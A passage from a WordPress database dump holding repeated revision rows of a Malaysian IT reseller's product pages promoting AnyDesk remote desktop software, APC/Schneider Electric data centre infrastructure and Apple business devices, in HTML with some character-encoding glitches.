07:09:58','',1437,'https://bintara.com.my/blog/2019/09/18/1437-revision-v1/',0,'revision','',0),(3172,1,'2019-09-18 15:07:30','2019-09-18 07:07:30','<h1>Anydesk</h1>\r\n\r\n &nbsp;\r\n\r\n<h3 class=\"u-font-size-xl u-space-mt-1/2 u-space-mb-1/4\">Remote Desktop Software That Actually Works</h3>\r\n<div class=\"o-header__subheading u-font-size-m u-space-mb-1/4 u-color-mid-gray\">\r\n\r\nConnect to a computer remotely, be it from the other end of the office or halfway around the world. AnyDesk ensures secure and reliable remote desktop connections for IT professionals and on-the-go individuals alike.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Unparalleled performance</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nLow latency, fast data transmissions, frame rates of 60 fps â€“ we know how critical these are when working on a remote desktop. Thatâ€™s why our innovative DeskRT codec ensures low lag, even at high screen resolutions or bandwidths of just 100 kB/s.\r\n\r\n</div>\r\n\r\n &nbsp;\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Multi-platform support</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk works across multiple platforms and operating systems: Windows, Linux, Free BSD, Mac OS, iOS and Android, plus we donâ€™t charge extra for mobile apps.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Secure by design</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nYour security has been built into AnyDesk from day one. We use banking-standard TLS 1.2 technology to ensure your computer is protected from unauthorized access and RSA 2048 asymmetric encryption to verify every connection. Plus, our servers use Erlang telecommunication technology for maximum reliability.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Built for pros, loved by all</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk has been designed and developed with IT professionals in mind, offering an unbeatable service for those who need fast, efficient and reliable remote access. AnyDesk is also a practical â€“ and totally free â€“ solution for private users.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Grows with you</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAs teams grow, their needs evolve â€“ and so should the software they use. AnyDesk lets you start small and scale quickly, with sensible pricing for teams of all sizes.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Anydesk','','inherit','closed','closed','','1437-revision-v1','','','2019-09-18 15:07:30','2019-09-18 07:07:30','',1437,'https://bintara.com.my/blog/2019/09/18/1437-revision-v1/',0,'revision','',0),(3173,1,'2019-09-18 15:09:15','2019-09-18 07:09:15','<h1>Anydesk</h1>\r\n\r\n&nbsp;\r\n\r\n<h3 class=\"u-font-size-xl u-space-mt-1/2 u-space-mb-1/4\">Remote Desktop Software That Actually Works</h3>\r\n<div class=\"o-header__subheading u-font-size-m u-space-mb-1/4 u-color-mid-gray\">\r\n\r\nConnect to a computer remotely, be it from the other end of the office or halfway around the world. AnyDesk ensures secure and reliable remote desktop connections for IT professionals and on-the-go individuals alike.\r\n\r\n&nbsp;\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Unparalleled performance</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nLow latency, fast data transmissions, frame rates of 60 fps â€“ we know how critical these are when working on a remote desktop. Thatâ€™s why our innovative DeskRT codec ensures low lag, even at high screen resolutions or bandwidths of just 100 kB/s.\r\n</div>\r\n\r\n&nbsp;\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Multi-platform support</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk works across multiple platforms and operating systems: Windows, Linux, Free BSD, Mac OS, iOS and Android, plus we donâ€™t charge extra for mobile apps.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Secure by design</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nYour security has been built into AnyDesk from day one. We use banking-standard TLS 1.2 technology to ensure your computer is protected from unauthorized access and RSA 2048 asymmetric encryption to verify every connection. Plus, our servers use Erlang telecommunication technology for maximum reliability.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Built for pros, loved by all</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk has been designed and developed with IT professionals in mind, offering an unbeatable service for those who need fast, efficient and reliable remote access. AnyDesk is also a practical â€“ and totally free â€“ solution for private users.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Grows with you</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAs teams grow, their needs evolve â€“ and so should the software they use. AnyDesk lets you start small and scale quickly, with sensible pricing for teams of all sizes.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Anydesk','','inherit','closed','closed','','1437-revision-v1','','','2019-09-18 15:09:15','2019-09-18 07:09:15','',1437,'https://bintara.com.my/blog/2019/09/18/1437-revision-v1/',0,'revision','',0),(3175,1,'2019-09-18 15:10:55','2019-09-18 07:10:55','<h1>Anydesk</h1>\r\n\r\n&nbsp;\r\n\r\n<h3 class=\"u-font-size-xl u-space-mt-1/2 u-space-mb-1/4\">Remote Desktop Software That Actually Works</h3>\r\n<div class=\"o-header__subheading u-font-size-m u-space-mb-1/4 u-color-mid-gray\">\r\n\r\nConnect to a computer remotely, be it from the other end of the office or halfway around the world. AnyDesk ensures secure and reliable remote desktop connections for IT professionals and on-the-go individuals alike.\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Unparalleled performance</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nLow latency, fast data transmissions, frame rates of 60 fps â€“ we know how critical these are when working on a remote desktop. Thatâ€™s why our innovative DeskRT codec ensures low lag, even at high screen resolutions or bandwidths of just 100 kB/s.\r\n</div>\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Multi-platform support</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk works across multiple platforms and operating systems: Windows, Linux, Free BSD, Mac OS, iOS and Android, plus we donâ€™t charge extra for mobile apps.\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Secure by design</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nYour security has been built into AnyDesk from day one. We use banking-standard TLS 1.2 technology to ensure your computer is protected from unauthorized access and RSA 2048 asymmetric encryption to verify every connection. Plus, our servers use Erlang telecommunication technology for maximum reliability.\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Built for pros, loved by all</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk has been designed and developed with IT professionals in mind, offering an unbeatable service for those who need fast, efficient and reliable remote access. AnyDesk is also a practical â€“ and totally free â€“ solution for private users.\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Grows with you</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAs teams grow, their needs evolve â€“ and so should the software they use. AnyDesk lets you start small and scale quickly, with sensible pricing for teams of all sizes.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Anydesk','','inherit','closed','closed','','1437-revision-v1','','','2019-09-18 15:10:55','2019-09-18 07:10:55','',1437,'https://bintara.com.my/blog/2019/09/18/1437-revision-v1/',0,'revision','',0),(3177,1,'2019-09-18 15:11:49','2019-09-18 07:11:49','<h1>Anydesk</h1>\r\n\r\n&nbsp;\r\n\r\n<h3 class=\"u-font-size-xl u-space-mt-1/2 u-space-mb-1/4\">Remote Desktop Software That Actually Works</h3>\r\n<div class=\"o-header__subheading u-font-size-m u-space-mb-1/4 u-color-mid-gray\">\r\n\r\nConnect to a computer remotely, be it from the other end of the office or halfway around the world. AnyDesk ensures secure and reliable remote desktop connections for IT professionals and on-the-go individuals alike.\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Unparalleled performance</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nLow latency, fast data transmissions, frame rates of 60 fps â€“ we know how critical these are when working on a remote desktop. Thatâ€™s why our innovative DeskRT codec ensures low lag, even at high screen resolutions or bandwidths of just 100 kB/s.\r\n</div>\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Multi-platform support</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk works across multiple platforms and operating systems: Windows, Linux, Free BSD, Mac OS, iOS and Android, plus we donâ€™t charge extra for mobile apps.\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Secure by design</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nYour security has been built into AnyDesk from day one. We use banking-standard TLS 1.2 technology to ensure your computer is protected from unauthorized access and RSA 2048 asymmetric encryption to verify every connection. Plus, our servers use Erlang telecommunication technology for maximum reliability.\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Built for pros, loved by all</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk has been designed and developed with IT professionals in mind, offering an unbeatable service for those who need fast, efficient and reliable remote access. AnyDesk is also a practical â€“ and totally free â€“ solution for private users.\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Grows with you</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAs teams grow, their needs evolve â€“ and so should the software they use. AnyDesk lets you start small and scale quickly, with sensible pricing for teams of all sizes.\r\n\r\n</div>\r\n\r\n<center>[maxbutton id=\"1\" ]</center>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Anydesk','','inherit','closed','closed','','1437-revision-v1','','','2019-09-18 15:11:49','2019-09-18 07:11:49','',1437,'https://bintara.com.my/blog/2019/09/18/1437-revision-v1/',0,'revision','',0),(3178,1,'2019-09-18 15:12:15','2019-09-18 07:12:15','<h1>Anydesk</h1>\r\n\r\n&nbsp;\r\n\r\n<h3 class=\"u-font-size-xl u-space-mt-1/2 u-space-mb-1/4\">Remote Desktop Software That Actually Works</h3>\r\n<div class=\"o-header__subheading u-font-size-m u-space-mb-1/4 u-color-mid-gray\">\r\n\r\nConnect to a computer remotely, be it from the other end of the office or halfway around the world. AnyDesk ensures secure and reliable remote desktop connections for IT professionals and on-the-go individuals alike.\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Unparalleled performance</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nLow latency, fast data transmissions, frame rates of 60 fps â€“ we know how critical these are when working on a remote desktop. Thatâ€™s why our innovative DeskRT codec ensures low lag, even at high screen resolutions or bandwidths of just 100 kB/s.\r\n</div>\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Multi-platform support</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk works across multiple platforms and operating systems: Windows, Linux, Free BSD, Mac OS, iOS and Android, plus we donâ€™t charge extra for mobile apps.\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Secure by design</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nYour security has been built into AnyDesk from day one. We use banking-standard TLS 1.2 technology to ensure your computer is protected from unauthorized access and RSA 2048 asymmetric encryption to verify every connection. Plus, our servers use Erlang telecommunication technology for maximum reliability.\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Built for pros, loved by all</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk has been designed and developed with IT professionals in mind, offering an unbeatable service for those who need fast, efficient and reliable remote access. AnyDesk is also a practical â€“ and totally free â€“ solution for private users.\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Grows with you</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAs teams grow, their needs evolve â€“ and so should the software they use. AnyDesk lets you start small and scale quickly, with sensible pricing for teams of all sizes.\r\n\r\n</div>\r\n&nbsp;\r\n<center>[maxbutton id=\"1\" ]</center>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Anydesk','','inherit','closed','closed','','1437-revision-v1','','','2019-09-18 15:12:15','2019-09-18 07:12:15','',1437,'https://bintara.com.my/blog/2019/09/18/1437-revision-v1/',0,'revision','',0),(3179,1,'2019-09-18 15:14:12','2019-09-18 07:14:12','<img class=\"alignnone wp-image-2086\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/APC_LockupLogo_tcm267-134996.png\" alt=\"\" width=\"300\" height=\"124\" />\r\n<h3 class=\"info-article-image__title\">Infrastructure solutions for home and office</h3>\r\nFrom battery backups that safeguard against outages at home, to full-scale data center infrastructure, our offers can help your home and business become more efficient, reliable, and connected.\r\n\r\n&nbsp;\r\n<h3>Top needs for data CENTER and networking</h3>\r\nOur data center solutions protect and optimize data centers and networks for cloud and big data architectures. Â Choose Schneider Electric if you want expert data center solutions that:\r\n<ul>\r\n 	<li>Simplify and speed up planning, designing and building your data center</li>\r\n 	<li>Roll out and implement software defined data centers</li>\r\n 	<li>Protect on-premise applications living on the edge</li>\r\n 	<li>Optimize costs and performance by balancing on-premise and cloud based applications</li>\r\n 	<li>Secure critical process applications that are isolated from developments of digitized processes and applications needed for the future</li>\r\n 	<li>Monitor, automate and control your entire data center physical infrastructure with integrated DCIM</li>\r\n</ul>\r\n&nbsp;\r\n<h3>Our Data Centre Solutions</h3>\r\nSchneider Electric delivers legendary reliability every step of the way. OurÂ Data Center Physical InfrastructureÂ options provide a strong, secure framework that is able to grow and adjust with your needs, while staying in budget and optimizing network performance.\r\n\r\nWhenÂ Data Center Infrastructure Management software (DCIM)Â is installed and your data center is operational, you can collect and analyze data, and control power and processes system-wide or on individual devices.\r\n\r\nAnd, ourÂ Data Center Life Cycle ServicesÂ enable you to use as much or little of our expertise no matter where you are in the data center life cycle. Â We offer a complete portfolio of services to assess, plan, design, build and operate your data center.\r\n\r\n&nbsp;\r\n<h3><span class=\"title\">The Data Centre Transformed</span></h3>\r\nImagine creating the ideal data centre â€” from rack to row to room to building. Our solutions can help transform your data centre with reliable, expert products developed to help you maintain uptime when every minute counts.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/DbZfNmlxz6g\" width=\"480\" height=\"288\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>','APC','','inherit','closed','closed','','1438-revision-v1','','','2019-09-18 15:14:12','2019-09-18 07:14:12','',1438,'https://bintara.com.my/blog/2019/09/18/1438-revision-v1/',0,'revision','',0),(3180,1,'2019-09-18 15:14:48','2019-09-18 07:14:48','<img class=\"alignnone wp-image-2086\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/APC_LockupLogo_tcm267-134996.png\" alt=\"\" width=\"300\" height=\"124\" />\r\n<h2 class=\"info-article-image__title\">Infrastructure solutions for home and office</h2>\r\nFrom battery backups that safeguard against outages at home, to full-scale data center infrastructure, our offers can help your home and business become more efficient, reliable, and connected.\r\n\r\n&nbsp;\r\n<h3>Top needs for data CENTER and networking</h3>\r\nOur data center solutions protect and optimize data centers and networks for cloud and big data architectures. Â Choose Schneider Electric if you want expert data center solutions that:\r\n<ul>\r\n 	<li>Simplify and speed up planning, designing and building your data center</li>\r\n 	<li>Roll out and implement software defined data centers</li>\r\n 	<li>Protect on-premise applications living on the edge</li>\r\n 	<li>Optimize costs and performance by balancing on-premise and cloud based applications</li>\r\n 	<li>Secure critical process applications that are isolated from developments of digitized processes and applications needed for the future</li>\r\n 	<li>Monitor, automate and control your entire data center physical infrastructure with integrated DCIM</li>\r\n</ul>\r\n&nbsp;\r\n<h3>Our Data Centre Solutions</h3>\r\nSchneider Electric delivers legendary reliability every step of the way. OurÂ Data Center Physical InfrastructureÂ options provide a strong, secure framework that is able to grow and adjust with your needs, while staying in budget and optimizing network performance.\r\n\r\nWhenÂ Data Center Infrastructure Management software (DCIM)Â is installed and your data center is operational, you can collect and analyze data, and control power and processes system-wide or on individual devices.\r\n\r\nAnd, ourÂ Data Center Life Cycle ServicesÂ enable you to use as much or little of our expertise no matter where you are in the data center life cycle. Â We offer a complete portfolio of services to assess, plan, design, build and operate your data center.\r\n\r\n&nbsp;\r\n<h3><span class=\"title\">The Data Centre Transformed</span></h3>\r\nImagine creating the ideal data centre â€” from rack to row to room to building. Our solutions can help transform your data centre with reliable, expert products developed to help you maintain uptime when every minute counts.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/DbZfNmlxz6g\" width=\"480\" height=\"288\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>','APC','','inherit','closed','closed','','1438-revision-v1','','','2019-09-18 15:14:48','2019-09-18 07:14:48','',1438,'https://bintara.com.my/blog/2019/09/18/1438-revision-v1/',0,'revision','',0),(3181,1,'2019-09-18 15:15:11','2019-09-18 07:15:11','<img class=\"alignnone wp-image-2086\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/APC_LockupLogo_tcm267-134996.png\" alt=\"\" width=\"300\" height=\"124\" />\r\n<h3 class=\"info-article-image__title\">Infrastructure solutions for home and office</h3>\r\nFrom battery backups that safeguard against outages at home, to full-scale data center infrastructure, our offers can help your home and business become more efficient, reliable, and connected.\r\n\r\n&nbsp;\r\n<h3>Top needs for data CENTER and networking</h3>\r\nOur data center solutions protect and optimize data centers and networks for cloud and big data architectures. Â Choose Schneider Electric if you want expert data center solutions that:\r\n<ul>\r\n 	<li>Simplify and speed up planning, designing and building your data center</li>\r\n 	<li>Roll out and implement software defined data centers</li>\r\n 	<li>Protect on-premise applications living on the edge</li>\r\n 	<li>Optimize costs and performance by balancing on-premise and cloud based applications</li>\r\n 	<li>Secure critical process applications that are isolated from developments of digitized processes and applications needed for the future</li>\r\n 	<li>Monitor, automate and control your entire data center physical infrastructure with integrated DCIM</li>\r\n</ul>\r\n&nbsp;\r\n<h3>Our Data Centre Solutions</h3>\r\nSchneider Electric delivers legendary reliability every step of the way. OurÂ Data Center Physical InfrastructureÂ options provide a strong, secure framework that is able to grow and adjust with your needs, while staying in budget and optimizing network performance.\r\n\r\nWhenÂ Data Center Infrastructure Management software (DCIM)Â is installed and your data center is operational, you can collect and analyze data, and control power and processes system-wide or on individual devices.\r\n\r\nAnd, ourÂ Data Center Life Cycle ServicesÂ enable you to use as much or little of our expertise no matter where you are in the data center life cycle. Â We offer a complete portfolio of services to assess, plan, design, build and operate your data center.\r\n\r\n&nbsp;\r\n<h3><span class=\"title\">The Data Centre Transformed</span></h3>\r\nImagine creating the ideal data centre â€” from rack to row to room to building. Our solutions can help transform your data centre with reliable, expert products developed to help you maintain uptime when every minute counts.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/DbZfNmlxz6g\" width=\"480\" height=\"288\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>','APC','','inherit','closed','closed','','1438-revision-v1','','','2019-09-18 15:15:11','2019-09-18 07:15:11','',1438,'https://bintara.com.my/blog/2019/09/18/1438-revision-v1/',0,'revision','',0),(3182,1,'2019-09-18 15:15:37','2019-09-18 07:15:37','<img class=\"alignnone wp-image-2086\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/APC_LockupLogo_tcm267-134996.png\" alt=\"\" width=\"300\" height=\"124\" />\r\n<h3 class=\"info-article-image__title\">Infrastructure solutions for home and office</h3>\r\nFrom battery backups that safeguard against outages at home, to full-scale data center infrastructure, our offers can help your home and business become more efficient, reliable, and connected.\r\n\r\n&nbsp;\r\n<h3>Top needs for data CENTER and networking</h3>\r\nOur data center solutions protect and optimize data centers and networks for cloud and big data architectures. Â Choose Schneider Electric if you want expert data center solutions that:\r\n<ul>\r\n 	<li>Simplify and speed up planning, designing and building your data center</li>\r\n 	<li>Roll out and implement software defined data centers</li>\r\n 	<li>Protect on-premise applications living on the edge</li>\r\n 	<li>Optimize costs and performance by balancing on-premise and cloud based applications</li>\r\n 	<li>Secure critical process applications that are isolated from developments of digitized processes and applications needed for the future</li>\r\n 	<li>Monitor, automate and control your entire data center physical infrastructure with integrated DCIM</li>\r\n</ul>\r\n&nbsp;\r\n<h3>Our Data Centre Solutions</h3>\r\nSchneider Electric delivers legendary reliability every step of the way. OurÂ Data Center Physical InfrastructureÂ options provide a strong, secure framework that is able to grow and adjust with your needs, while staying in budget and optimizing network performance.\r\n\r\nWhenÂ Data Center Infrastructure Management software (DCIM)Â is installed and your data center is operational, you can collect and analyze data, and control power and processes system-wide or on individual devices.\r\n\r\nAnd, ourÂ Data Center Life Cycle ServicesÂ enable you to use as much or little of our expertise no matter where you are in the data center life cycle. Â We offer a complete portfolio of services to assess, plan, design, build and operate your data center.\r\n\r\n&nbsp;\r\n<h3><span class=\"title\">The Data Centre Transformed</span></h3>\r\nImagine creating the ideal data centre â€” from rack to row to room to building. Our solutions can help transform your data centre with reliable, expert products developed to help you maintain uptime when every minute counts.\r\n\r\n&nbsp;\r\n\r\n<center>[maxbutton id=\"1\" ]</center>\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/DbZfNmlxz6g\" width=\"480\" height=\"288\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>','APC','','inherit','closed','closed','','1438-revision-v1','','','2019-09-18 15:15:37','2019-09-18 07:15:37','',1438,'https://bintara.com.my/blog/2019/09/18/1438-revision-v1/',0,'revision','',0),(3183,1,'2019-09-18 15:35:20','2019-09-18 07:35:20','<h3 class=\"typography-headline\">The most powerful products for business are the ones people already love to use</h3>\r\n<p class=\"typography-intro-elevated\">Apple products have always been designed for the way we work as much as for the way we live. Today they help employees to work more simply and productively, solve problems creatively and collaborate with a shared purpose. And theyâ€™re all designed to work together beautifully. When people have access to iPhone, iPad and Mac, they can do their best work and reimagine the future of their business.</p>\r\n\r\n&nbsp;\r\n\r\n<h3>iPAD PRO</h3>\r\n<img class=\"alignnone wp-image-2403\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ipad-pro.png\" alt=\"\" width=\"217\" height=\"257\" />\r\n<h4>Why iPadÂ Pro</h4>\r\n<ul>\r\n 	<li><strong>iPad Pro does what a computer does but more in intuitive way --</strong> Use multiple apps at the same time with a few taps. Move objects between apps simply by dragging and dropping, or switch apps with a single swipe.</li>\r\n 	<li><strong>Works like your iPhone, so it\'s similar to use --</strong> iPad Pro runs iOS, so it does all the things your iPhone does as well as things only iPad can do. And odds are you already know how to use it. Just tap, swipe, pinch, and zoom.</li>\r\n 	<li><strong>iPad Pro works with a keyboard when you need one --Â </strong>The full-sized onscreen keyboard lets you respond to an email or write a paper and it even acts as a trackpad. And if you want a full-sized physical keyboard, just attach the Smart Keyboard Folio for a great typing experience, and front and back protection.</li>\r\n 	<li><strong>iPad Pro has great apps you\'ll use everyday --Â </strong>Like photos, messages, safari, mail, calendar and more, it also comes with great productivity apps like Pages and Keynote and runs familiar apps like Microsoft Word and Adobe Photoshop CC.</li>\r\n 	<li><strong>It\'s made to protect your privacy --Â </strong>Your stuff is safe because iPad Pro comes with features like Face ID which is the most secure facial authentication system in a tablet or a computer. And it has features like Intelligent Tracking Prevention in Safari, which helps protect against websites collecting your personal data.</li>\r\n 	<li><strong>Has a place for your files and a way to get to them from all your devices --Â </strong>All your files in one central location. With the Files app, you can organise what\'s in iCloud Drive, on third-party cloud services such as Box and Dropbox, and on your iPad Pro, however you want.</li>\r\n</ul>\r\n<h3>Â MACBOOK PRO</h3>\r\n<img class=\"alignnone wp-image-2404\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/macbook-pro.jpg\" alt=\"\" width=\"220\" height=\"205\" />\r\n\r\n&nbsp;\r\n<h4 class=\"typography-headline-elevated\" data-reveal-group=\"1\">More power. More performance. More pro.</h4>\r\n<ul>\r\n 	<li>New eighth-generation Intel 6â€‘core and quad-core processors</li>\r\n 	<li>Up to 32GB of memory for running multiple pro apps</li>\r\n 	<li>Stunning Retina display with True Tone technology</li>\r\n 	<li>Touch Bar for working more productively</li>\r\n</ul>\r\n<h3>iMAC PRO</h3>\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2405\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/imac-pro.jpg\" alt=\"\" width=\"220\" height=\"220\" />\r\n<h4 class=\"hero-subheadline columns large-12 center\">Power to theÂ pro.</h4>\r\n<p class=\"label large-10 small-12 center\">Pros love iMac. So we created one just for you. Itâ€™s packed with the most powerful graphics and processors ever in a Mac, along with the most advanced storage, memory and I/O â€” all behind a breathtaking Retina 5K display in a sleek, all-in-one design. For everyone from photographers to video editors to 3D animators to musicians to software developers to scientists, iMac Pro is ready toÂ turn your biggest ideas into your greatestÂ work.</p>\r\nTo discover more about this product, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','Apple','','inherit','closed','closed','','1439-revision-v1','','','2019-09-18 15:35:20','2019-09-18 07:35:20','',1439,'https://bintara.com.my/blog/2019/09/18/1439-revision-v1/',0,'revision','',0),(3184,1,'2019-09-18 15:35:43','2019-09-18 07:35:43','<h3 class=\"typography-headline\">The most powerful products for business are the ones people already love to use</h3>\r\n<p class=\"typography-intro-elevated\">Apple products have always been designed for the way we work as much as for the way we live. Today they help employees to work more simply and productively, solve problems creatively and collaborate with a shared purpose. And theyâ€™re all designed to work together beautifully. When people have access to iPhone, iPad and Mac, they can do their best work and reimagine the future of their business.</p>\r\n\r\n&nbsp;\r\n\r\n<h2>iPAD PRO</h2>\r\n<img class=\"alignnone wp-image-2403\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ipad-pro.png\" alt=\"\" width=\"217\" height=\"257\" />\r\n<h4>Why iPadÂ Pro</h4>\r\n<ul>\r\n 	<li><strong>iPad Pro does what a computer does but more in intuitive way --</strong> Use multiple apps at the same time with a few taps. Move objects between apps simply by dragging and dropping, or switch apps with a single swipe.</li>\r\n 	<li><strong>Works like your iPhone, so it\'s similar to use --</strong> iPad Pro runs iOS, so it does all the things your iPhone does as well as things only iPad can do. And odds are you already know how to use it. Just tap, swipe, pinch, and zoom.</li>\r\n 	<li><strong>iPad Pro works with a keyboard when you need one --Â </strong>The full-sized onscreen keyboard lets you respond to an email or write a paper and it even acts as a trackpad. And if you want a full-sized physical keyboard, just attach the Smart Keyboard Folio for a great typing experience, and front and back protection.</li>\r\n 	<li><strong>iPad Pro has great apps you\'ll use everyday --Â </strong>Like photos, messages, safari, mail, calendar and more, it also comes with great productivity apps like Pages and Keynote and runs familiar apps like Microsoft Word and Adobe Photoshop CC.</li>\r\n 	<li><strong>It\'s made to protect your privacy --Â </strong>Your stuff is safe because iPad Pro comes with features like Face ID which is the most secure facial authentication system in a tablet or a computer. And it has features like Intelligent Tracking Prevention in Safari, which helps protect against websites collecting your personal data.</li>\r\n 	<li><strong>Has a place for your files and a way to get to them from all your devices --Â </strong>All your files in one central location. With the Files app, you can organise what\'s in iCloud Drive, on third-party cloud services such as Box and Dropbox, and on your iPad Pro, however you want.</li>\r\n</ul>\r\n<h3>Â MACBOOK PRO</h3>\r\n<img class=\"alignnone wp-image-2404\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/macbook-pro.jpg\" alt=\"\" width=\"220\" height=\"205\" />\r\n\r\n&nbsp;\r\n<h4 class=\"typography-headline-elevated\" data-reveal-group=\"1\">More power. More performance. More pro.</h4>\r\n<ul>\r\n 	<li>New eighth-generation Intel 6â€‘core and quad-core processors</li>\r\n 	<li>Up to 32GB of memory for running multiple pro apps</li>\r\n 	<li>Stunning Retina display with True Tone technology</li>\r\n 	<li>Touch Bar for working more productively</li>\r\n</ul>\r\n<h3>iMAC PRO</h3>\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2405\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/imac-pro.jpg\" alt=\"\" width=\"220\" height=\"220\" />\r\n<h4 class=\"hero-subheadline columns large-12 center\">Power to theÂ pro.</h4>\r\n<p class=\"label large-10 small-12 center\">Pros love iMac. So we created one just for you. Itâ€™s packed with the most powerful graphics and processors ever in a Mac, along with the most advanced storage, memory and I/O â€” all behind a breathtaking Retina 5K display in a sleek, all-in-one design. For everyone from photographers to video editors to 3D animators to musicians to software developers to scientists, iMac Pro is ready toÂ turn your biggest ideas into your greatestÂ work.</p>\r\nTo discover more about this product, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','Apple','','inherit','closed','closed','','1439-revision-v1','','','2019-09-18 15:35:43','2019-09-18 07:35:43','',1439,'https://bintara.com.my/blog/2019/09/18/1439-revision-v1/',0,'revision','',0),(3185,1,'2019-09-18 15:36:05','2019-09-18 07:36:05','<h3 class=\"typography-headline\">The most powerful products for business are the ones people already love to use</h3>\r\n<p class=\"typography-intro-elevated\">Apple products have always been designed for the way we work as much as for the way we live. Today they help employees to work more simply and productively, solve problems creatively and collaborate with a shared purpose. And theyâ€™re all designed to work together beautifully. When people have access to iPhone, iPad and Mac, they can do their best work and reimagine the future of their business.</p>\r\n\r\n&nbsp;\r\n\r\n<h3>iPAD PRO</h3>\r\n<img class=\"alignnone wp-image-2403\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ipad-pro.png\" alt=\"\" width=\"217\" height=\"257\" />\r\n<h4>Why iPadÂ Pro</h4>\r\n<ul>\r\n 	<li><strong>iPad Pro does what a computer does but more in intuitive way --</strong> Use multiple apps at the same time with a few taps. Move objects between apps simply by dragging and dropping, or switch apps with a single swipe.</li>\r\n 	<li><strong>Works like your iPhone, so it\'s similar to use --</strong> iPad Pro runs iOS, so it does all the things your iPhone does as well as things only iPad can do. And odds are you already know how to use it. Just tap, swipe, pinch, and zoom.</li>\r\n 	<li><strong>iPad Pro works with a keyboard when you need one --Â </strong>The full-sized onscreen keyboard lets you respond to an email 